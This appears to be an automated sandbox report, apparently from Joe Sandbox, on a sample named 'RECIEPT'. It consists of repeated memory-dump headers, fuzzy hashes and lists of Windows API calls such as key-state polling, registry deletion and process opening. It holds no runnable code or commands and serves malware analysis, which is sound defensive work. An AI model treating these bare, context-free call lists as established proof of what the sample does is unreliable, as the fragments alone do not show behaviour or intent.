                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Handle
                                        • String ID: nul
                                        • API String ID: 2519475695-2873401336
                                        • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                        • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                        • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                        • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: SysAnimate32
                                        • API String ID: 0-1011021900
                                        • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                        • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                        • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                        • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                        APIs
                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                          • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                          • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                          • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                          • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                        • GetFocus.USER32 ref: 0046157B
                                          • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                          • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                        • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                        • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                        • __swprintf.LIBCMT ref: 00461608
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                        • String ID: %s%d
                                        • API String ID: 2645982514-1110647743
                                        • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                        • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                        • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                        • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                        • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                        • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                        • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                        APIs
                                        • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                        • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Process$CloseCountersCurrentHandleOpen
                                        • String ID:
                                        • API String ID: 3488606520-0
                                        • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                        • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                        • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                        • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                        APIs
                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: ConnectRegistry_memmove_wcslen
                                        • String ID:
                                        • API String ID: 15295421-0
                                        • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                        • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                        • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                        • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                        APIs
                                        • GetCursorPos.USER32(?), ref: 004563A6
                                        • ScreenToClient.USER32(?,?), ref: 004563C3
                                        • GetAsyncKeyState.USER32(?), ref: 00456400
                                        • GetAsyncKeyState.USER32(?), ref: 00456410
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: AsyncState$ClientCursorLongScreenWindow
                                        • String ID:
                                        • API String ID: 3539004672-0
                                        • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                        • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                        • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                        • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                        APIs
                                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                        • Sleep.KERNEL32(0000000A), ref: 0047D455
                                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Interlocked$DecrementIncrement$Sleep
                                        • String ID:
                                        • API String ID: 327565842-0
                                        • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                        • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                        • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                        • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                        APIs
                                        • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                        • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                        • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                        • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: PrivateProfile$SectionWrite$String
                                        • String ID:
                                        • API String ID: 2832842796-0
                                        • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                        • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                        • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                        • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                        APIs
                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                        • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Enum$CloseDeleteOpen
                                        • String ID:
                                        • API String ID: 2095303065-0
                                        • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                        • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                        • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                        • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                        APIs
                                        • GetWindowRect.USER32(?,?), ref: 00436A24
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: RectWindow
                                        • String ID:
                                        • API String ID: 861336768-0
                                        • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                        • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                        • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                        • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                        APIs
                                        • SendMessageW.USER32 ref: 00449598
                                          • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                        • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                        • _wcslen.LIBCMT ref: 0044960D
                                        • _wcslen.LIBCMT ref: 0044961A
                                        • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: MessageSend$_wcslen$_wcspbrk
                                        • String ID:
                                        • API String ID: 1856069659-0
                                        • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                        • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                        • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                        • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                        APIs
                                        • GetCursorPos.USER32(?), ref: 004478E2
                                        • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                        • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                        • GetCursorPos.USER32(00000000), ref: 0044796A
                                        • TrackPopupMenuEx.USER32(02E26440,00000000,00000000,?,?,00000000), ref: 00447991
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: CursorMenuPopupTrack$Proc
                                        • String ID:
                                        • API String ID: 1300944170-0
                                        • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                        • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                        • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                        • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                        APIs
                                        • GetClientRect.USER32(?,?), ref: 004479CC
                                        • GetCursorPos.USER32(?), ref: 004479D7
                                        • ScreenToClient.USER32(?,?), ref: 004479F3
                                        • WindowFromPoint.USER32(?,?), ref: 00447A34
                                        • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Client$CursorFromPointProcRectScreenWindow
                                        • String ID:
                                        • API String ID: 1822080540-0
                                        • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                        • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                        • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                        • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                        APIs
                                        • GetWindowRect.USER32(?,?), ref: 00447C5D
                                        • ScreenToClient.USER32(?,?), ref: 00447C7B
                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                        • EndPaint.USER32(?,?), ref: 00447D13
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: ClientPaintRectRectangleScreenViewportWindow
                                        • String ID:
                                        • API String ID: 659298297-0
                                        • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                        • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                        • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                        • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                        APIs
                                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                                          • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                          • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                          • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                          • Part of subcall function 00440D98: SendMessageW.USER32(02E21B80,000000F1,00000000,00000000), ref: 00440E6E
                                          • Part of subcall function 00440D98: SendMessageW.USER32(02E21B80,000000F1,00000001,00000000), ref: 00440E9A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
